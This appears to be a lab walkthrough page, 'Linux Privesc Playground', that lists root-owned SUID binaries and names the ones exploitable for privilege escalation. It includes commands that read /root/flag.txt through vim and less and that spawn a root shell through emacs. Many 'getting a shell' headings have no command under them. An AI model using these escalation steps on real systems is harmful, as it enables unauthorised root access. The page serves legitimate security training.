Linux Privesc Playground

All the files with SUID bit set that belong to root:

-bash-4.2$ find / -user root -perm /4000 2>/dev/null
/usr/sbin/arp
/usr/sbin/node
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/wget
/usr/bin/cut
/usr/bin/base64
/usr/bin/traceroute6.iputils
/usr/bin/tail
/usr/bin/aria2c
/usr/bin/ul
/usr/bin/shuf
/usr/bin/php5
/usr/bin/gpasswd
/usr/bin/make
/usr/bin/openssl
/usr/bin/file
/usr/bin/tclsh8.5
/usr/bin/env
/usr/bin/diff
/usr/bin/watch
/usr/bin/strace
/usr/bin/rlwrap
/usr/bin/expand
/usr/bin/fold
/usr/bin/vim.basic
/usr/bin/timeout
/usr/bin/xargs
/usr/bin/expect
/usr/bin/chsh
/usr/bin/jq
/usr/bin/perl5.14.2
/usr/bin/readelf
/usr/bin/sudo
/usr/bin/ionice
/usr/bin/sudoedit
/usr/bin/unshare
/usr/bin/time
/usr/bin/taskset
/usr/bin/mtr
/usr/bin/emacs23-x
/usr/bin/flock
/usr/bin/tee
/usr/bin/xxd
/usr/bin/setarch
/usr/bin/python2.7
/usr/bin/uniq
/usr/bin/head
/usr/bin/sort
/usr/bin/newgrp
/usr/bin/stdbuf
/usr/bin/nl
/usr/bin/perl
/usr/bin/tftp
/usr/bin/find
/usr/bin/passwd
/usr/bin/rsync
/usr/bin/docker
/usr/bin/pg
/usr/bin/fmt
/usr/bin/nice
/usr/bin/od
/usr/bin/chfn
/usr/bin/gimp-2.6
/usr/bin/gdb
/usr/bin/unexpand
/sbin/dmsetup
/sbin/start-stop-daemon
/sbin/logsave
/bin/sed
/bin/mount
/bin/mv
/bin/cp
/bin/dash
/bin/ksh93
/bin/chmod
/bin/ping
/bin/chown
/bin/fusermount
/bin/bash
/bin/nano
/bin/ip
/bin/more
/bin/cat
/bin/zsh4
/bin/less
/bin/su
/bin/busybox
/bin/dd
/bin/grep
/bin/run-parts
/bin/ping6
/bin/date
/bin/bsd-csh
/bin/umount

All the binaries that can be exploited in the list above:

arp

cut

base64

tail

ul

shuf

php

openssl

file

tclsh

env

diff

strace

rlwrap

expand

fold

vim

vim /root/flag.txt

getting a shell

xargs

getting a shell

timeout

expect

jq

readelf

ionice

time

unshare

taskset

emacs

emacs /root/flag.txt

getting a shell

emacs -Q -nw --eval '(term "/bin/sh")'

flock

xxd

setarch

python

getting shell

uniq

sort

head

stdbuf

nl

find

getting shell

rsync

pg

getting shell

fmt

nice

od

gdb

unexpand

start-stop-daemon

sed

getting shell

logsave

dash

cp

ksh

getting shell

bash

more

ip

cat

zsh

less

less /root/flag.txt

dd

grep

run-parts

date

PreviousWebAppSec 101NextIntro to x86-64

Last updated

Was this helpful?